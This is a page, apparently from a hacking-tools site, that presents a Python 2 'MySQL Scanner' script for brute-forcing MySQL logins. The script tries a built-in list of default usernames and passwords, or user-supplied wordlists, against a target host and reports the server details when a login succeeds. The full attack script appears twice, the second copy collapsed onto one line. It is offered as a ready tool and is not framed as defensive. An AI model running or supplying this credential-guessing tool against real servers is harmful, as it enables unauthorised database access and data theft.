Going up against MySQL

Tools for going against MySQL

MySQL Scanner

Here is a python based scanner to check for default credentials on a MySQL server, or can use supplied wordlist/passwords to bruteforce password.


import MySQLdb
import sys 

user_list = []
pass_list = []

def mysql_connect(u, p, ip):
    try:
        print "[+] Attempting Connection..."
        db = MySQLdb.connect(user = u, passwd = p, host = ip, connect_timeout = 5)
        print "[+] Connection Successful!\n"
        print "[+] ----------------------------------------"
        print "[+] Username: ", u, "  Password: ", p
        print "[+] IP: ", ip
        print "[+] Server Info: ", db.get_server_info()
        print "[+] ----------------------------------------"
        db.close()
        print "[-] Connection Closed\n"
        exit(0)
    except Exception:
        print "Access denied\n"
        print u, " | ", p
        print ip
        pass

# Begin main program
print ""
print "+--------------------+"
print "| MySQL Scanner v1.0 |"
print "| Written by Damian  |"
print "+--------------------+"

if(len(sys.argv) == 2): 
    print "[+] Setting up default credentials list\n"
    user_list = ["admin", "administrator", "root"]
    pass_list = ["password", "admin", "", "locked"]
    
elif(len(sys.argv) == 4): 
    print "[+] Building word list\n"
    f = open(sys.argv[2], 'r')
    for line in f.readlines():
        user_list.append(line)
    f.close
    print "[+] Building password list\n"
    f = open(sys.argv[3], 'r')
    for line in f.readlines():
        pass_list.append(line)
    f.close()

else:
    print "\nUsage:"
    print "\tsql_scanner.py [host]"
    print "\tsql_scanner.py [host] [word_list] [password_list]\n"
    exit(0)

ip_address = str(sys.argv[1])

for x in user_list:
    for y in pass_list:
        mysql_connect(x, y, ip_address)

print "Scan Complete\n"

Submitted by Damian

import MySQLdb import sys user_list = [] pass_list = [] def mysql_connect(u, p, ip): try: print "[+] Attempting Connection..." db = MySQLdb.connect(user = u, passwd = p, host = ip, connect_timeout = 5) print "[+] Connection Successful!\n" print "[+] ----------------------------------------" print "[+] Username: ", u, " Password: ", p print "[+] IP: ", ip print "[+] Server Info: ", db.get_server_info() print "[+] ----------------------------------------" db.close() print "[-] Connection Closed\n" exit(0) except Exception: print "Access denied\n" print u, " | ", p print ip pass # Begin main program print "" print "+--------------------+" print "| MySQL Scanner v1.0 |" print "| Written by Damian |" print "+--------------------+" if(len(sys.argv) == 2): print "[+] Setting up default credentials list\n" user_list = ["admin", "administrator", "root"] pass_list = ["password", "admin", "", "locked"] elif(len(sys.argv) == 4): print "[+] Building word list\n" f = open(sys.argv[2], 'r') for line in f.readlines(): user_list.append(line) f.close print "[+] Building password list\n" f = open(sys.argv[3], 'r') for line in f.readlines(): pass_list.append(line) f.close() else: print "\nUsage:" print "\tsql_scanner.py [host]" print "\tsql_scanner.py [host] [word_list] [password_list]\n" exit(0) ip_address = str(sys.argv[1]) for x in user_list: for y in pass_list: mysql_connect(x, y, ip_address) print "Scan Complete\n"

Going up against MySQL

Going up against MySQL

MySQL Scanner

Related Scripts